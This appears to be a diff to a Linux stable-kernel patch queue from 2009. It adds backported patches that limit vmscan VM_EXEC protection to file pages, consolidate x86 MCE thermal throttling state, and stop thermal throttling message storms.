+nfsv4-fix-a-bug-when-the-server-returns-nfs4err_resource.patch
+nfsv4-fix-two-unbalanced-put_rpccred-issues.patch
+nfsv4-kill-nfs4_renewd_prepare_shutdown.patch
+nfsv4-the-link-operation-should-return-any-delegation-on-the-file.patch
+powerpc-remove-smp-warning-from-powermac-cpufreq.patch
+vmscan-limit-vm_exec-protection-to-file-pages.patch
+x86-mce-clean-up-thermal-throttling-state-tracking-code.patch
+x86-mce-fix-thermal-throttling-message-storm.patch
+iwlwifi-fix-potential-rx-buffer-loss.patch
+iwlwifi-reduce-noise-when-skb-allocation-fails.patch
--- /dev/null
+From 41e20983fe553b39bc2b00e07c7a379f0c86a4bc Mon Sep 17 00:00:00 2001
+From: Wu Fengguang <fengguang.wu@intel.com>
+Date: Mon, 26 Oct 2009 16:49:53 -0700
+Subject: vmscan: limit VM_EXEC protection to file pages
+
+From: Wu Fengguang <fengguang.wu@intel.com>
+
+commit 41e20983fe553b39bc2b00e07c7a379f0c86a4bc upstream.
+
+It is possible to have !Anon but SwapBacked pages, and some apps could
+create huge number of such pages with MAP_SHARED|MAP_ANONYMOUS. These
+pages go into the ANON lru list, and hence shall not be protected: we only
+care mapped executable files. Failing to do so may trigger OOM.
+
+Tested-by: Christian Borntraeger <borntraeger@de.ibm.com>
+Reviewed-by: Rik van Riel <riel@redhat.com>
+Signed-off-by: Wu Fengguang <fengguang.wu@intel.com>
+Cc: Hugh Dickins <hugh.dickins@tiscali.co.uk>
+Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
+Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ mm/vmscan.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/mm/vmscan.c
++++ b/mm/vmscan.c
+@@ -1298,7 +1298,7 @@ static void shrink_active_list(unsigned
+ * IO, plus JVM can create lots of anon VM_EXEC pages,
+ * so we ignore them here.
+ */
+- if ((vm_flags & VM_EXEC) && !PageAnon(page)) {
++ if ((vm_flags & VM_EXEC) && page_is_file_cache(page)) {
+ list_add(&page->lru, &l_active);
+ continue;
+ }
--- /dev/null
+From 3967684006f30c253bc6d4a6604d1bad4a7fc672 Mon Sep 17 00:00:00 2001
+From: Ingo Molnar <mingo@elte.hu>
+Date: Tue, 22 Sep 2009 15:50:24 +0200
+Subject: x86: mce: Clean up thermal throttling state tracking code
+
+From: Ingo Molnar <mingo@elte.hu>
+
+commit 3967684006f30c253bc6d4a6604d1bad4a7fc672 upstream.
+
+Instead of a mess of three separate percpu variables, consolidate
+the state into a single structure.
+
+Also clean up therm_throt_process(), use cleaner and more
+understandable variable names and a clearer logic.
+
+This, without changing the logic, makes the code more
+streamlined, more readable and smaller as well:
+
+ text data bss dec hex filename
+ 1487 169 4 1660 67c therm_throt.o.before
+ 1432 176 4 1612 64c therm_throt.o.after
+
+Cc: Hidetoshi Seto <seto.hidetoshi@jp.fujitsu.com>
+Cc: Huang Ying <ying.huang@intel.com>
+Cc: Andi Kleen <ak@linux.intel.com>
+LKML-Reference: <new-submission>
+Signed-off-by: Ingo Molnar <mingo@elte.hu>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ arch/x86/kernel/cpu/mcheck/therm_throt.c | 63 +++++++++++++++++++------------
+ 1 file changed, 39 insertions(+), 24 deletions(-)
+
+--- a/arch/x86/kernel/cpu/mcheck/therm_throt.c
++++ b/arch/x86/kernel/cpu/mcheck/therm_throt.c
+@@ -34,20 +34,30 @@
+ /* How long to wait between reporting thermal events */
+ #define CHECK_INTERVAL (300 * HZ)
+
+-static DEFINE_PER_CPU(__u64, next_check) = INITIAL_JIFFIES;
+-static DEFINE_PER_CPU(unsigned long, thermal_throttle_count);
+-static DEFINE_PER_CPU(bool, thermal_throttle_active);
++/*
++ * Current thermal throttling state:
++ */
++struct thermal_state {
++ bool is_throttled;
++
++ u64 next_check;
++ unsigned long throttle_count;
++};
++
++static DEFINE_PER_CPU(struct thermal_state, thermal_state);
+
+-static atomic_t therm_throt_en = ATOMIC_INIT(0);
++static atomic_t therm_throt_en = ATOMIC_INIT(0);
+
+ #ifdef CONFIG_SYSFS
+ #define define_therm_throt_sysdev_one_ro(_name) \
+ static SYSDEV_ATTR(_name, 0444, therm_throt_sysdev_show_##_name, NULL)
+
+ #define define_therm_throt_sysdev_show_func(name) \
+-static ssize_t therm_throt_sysdev_show_##name(struct sys_device *dev, \
+- struct sysdev_attribute *attr, \
+- char *buf) \
++ \
++static ssize_t therm_throt_sysdev_show_##name( \
++ struct sys_device *dev, \
++ struct sysdev_attribute *attr, \
++ char *buf) \
+ { \
+ unsigned int cpu = dev->id; \
+ ssize_t ret; \
+@@ -55,7 +65,7 @@ static ssize_t therm_throt_sysdev_show_#
+ preempt_disable(); /* CPU hotplug */ \
+ if (cpu_online(cpu)) \
+ ret = sprintf(buf, "%lu\n", \
+- per_cpu(thermal_throttle_##name, cpu)); \
++ per_cpu(thermal_state, cpu).name); \
+ else \
+ ret = 0; \
+ preempt_enable(); \
+@@ -63,11 +73,11 @@ static ssize_t therm_throt_sysdev_show_#
+ return ret; \
+ }
+
+-define_therm_throt_sysdev_show_func(count);
+-define_therm_throt_sysdev_one_ro(count);
++define_therm_throt_sysdev_show_func(throttle_count);
++define_therm_throt_sysdev_one_ro(throttle_count);
+
+ static struct attribute *thermal_throttle_attrs[] = {
+- &attr_count.attr,
++ &attr_throttle_count.attr,
+ NULL
+ };
+
+@@ -93,33 +103,38 @@ static struct attribute_group thermal_th
+ * 1 : Event should be logged further, and a message has been
+ * printed to the syslog.
+ */
+-static int therm_throt_process(int curr)
++static int therm_throt_process(bool is_throttled)
+ {
+- unsigned int cpu = smp_processor_id();
+- __u64 tmp_jiffs = get_jiffies_64();
+- bool was_throttled = __get_cpu_var(thermal_throttle_active);
+- bool is_throttled = __get_cpu_var(thermal_throttle_active) = curr;
++ struct thermal_state *state;
++ unsigned int this_cpu;
++ bool was_throttled;
++ u64 now;
++
++ this_cpu = smp_processor_id();
++ now = get_jiffies_64();
++ state = &per_cpu(thermal_state, this_cpu);
++
++ was_throttled = state->is_throttled;
++ state->is_throttled = is_throttled;
+
+ if (is_throttled)
+- __get_cpu_var(thermal_throttle_count)++;
++ state->throttle_count++;
+
+ if (!(was_throttled ^ is_throttled) &&
+- time_before64(tmp_jiffs, __get_cpu_var(next_check)))
++ time_before64(now, state->next_check))
+ return 0;
+
+- __get_cpu_var(next_check) = tmp_jiffs + CHECK_INTERVAL;
++ state->next_check = now + CHECK_INTERVAL;
+
+ /* if we just entered the thermal event */
+ if (is_throttled) {
+- printk(KERN_CRIT "CPU%d: Temperature above threshold, "
+- "cpu clock throttled (total events = %lu)\n",
+- cpu, __get_cpu_var(thermal_throttle_count));
++ printk(KERN_CRIT "CPU%d: Temperature above threshold, cpu clock throttled (total events = %lu)\n", this_cpu, state->throttle_count);
+
+ add_taint(TAINT_MACHINE_CHECK);
+ return 1;
+ }
+ if (was_throttled) {
+- printk(KERN_INFO "CPU%d: Temperature/speed normal\n", cpu);
++ printk(KERN_INFO "CPU%d: Temperature/speed normal\n", this_cpu);
+ return 1;
+ }
+
+@@ -213,7 +228,7 @@ static void intel_thermal_interrupt(void
+ __u64 msr_val;
+
+ rdmsrl(MSR_IA32_THERM_STATUS, msr_val);
+- if (therm_throt_process(msr_val & THERM_STATUS_PROCHOT))
++ if (therm_throt_process((msr_val & THERM_STATUS_PROCHOT) != 0))
+ mce_log_therm_throt_event(msr_val);
+ }
+
--- /dev/null
+From b417c9fd8690637f0c91479435ab3e2bf450c038 Mon Sep 17 00:00:00 2001
+From: Ingo Molnar <mingo@elte.hu>
+Date: Tue, 22 Sep 2009 15:50:24 +0200
+Subject: x86: mce: Fix thermal throttling message storm
+
+From: Ingo Molnar <mingo@elte.hu>
+
+commit b417c9fd8690637f0c91479435ab3e2bf450c038 upstream.
+
+If a system switches back and forth between hot and cold mode,
+the MCE code will print a stream of critical kernel messages.
+
+Extend the throttling code to properly notice this, by
+only printing the first hot + cold transition and omitting
+the rest up to CHECK_INTERVAL (5 minutes).
+
+This way we'll only get a single incident of:
+
+ [ 102.356584] CPU0: Temperature above threshold, cpu clock throttled (total events = 1)
+ [ 102.357000] Disabling lock debugging due to kernel taint
+ [ 102.369223] CPU0: Temperature/speed normal
+
+Every 5 minutes. The 'total events' count tells the number of cold/hot
+transitions detected, should overheating occur after 5 minutes again:
+
+[ 402.357580] CPU0: Temperature above threshold, cpu clock throttled (total events = 24891)
+[ 402.358001] CPU0: Temperature/speed normal
+[ 450.704142] Machine check events logged
+
+Cc: Hidetoshi Seto <seto.hidetoshi@jp.fujitsu.com>
+Cc: Huang Ying <ying.huang@intel.com>
+Cc: Andi Kleen <ak@linux.intel.com>
+LKML-Reference: <new-submission>
+Signed-off-by: Ingo Molnar <mingo@elte.hu>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ arch/x86/kernel/cpu/mcheck/therm_throt.c | 6 ++++--
+ 1 file changed, 4 insertions(+), 2 deletions(-)
+
+--- a/arch/x86/kernel/cpu/mcheck/therm_throt.c
++++ b/arch/x86/kernel/cpu/mcheck/therm_throt.c
+@@ -42,6 +42,7 @@ struct thermal_state {
+
+ u64 next_check;
+ unsigned long throttle_count;
++ unsigned long last_throttle_count;
+ };
+
+ static DEFINE_PER_CPU(struct thermal_state, thermal_state);
+@@ -120,11 +121,12 @@ static int therm_throt_process(bool is_t
+ if (is_throttled)
+ state->throttle_count++;
+
+- if (!(was_throttled ^ is_throttled) &&
+- time_before64(now, state->next_check))
++ if (time_before64(now, state->next_check) &&
++ state->throttle_count != state->last_throttle_count)
+ return 0;
+
+ state->next_check = now + CHECK_INTERVAL;
++ state->last_throttle_count = state->throttle_count;
+
+ /* if we just entered the thermal event */
+ if (is_throttled) {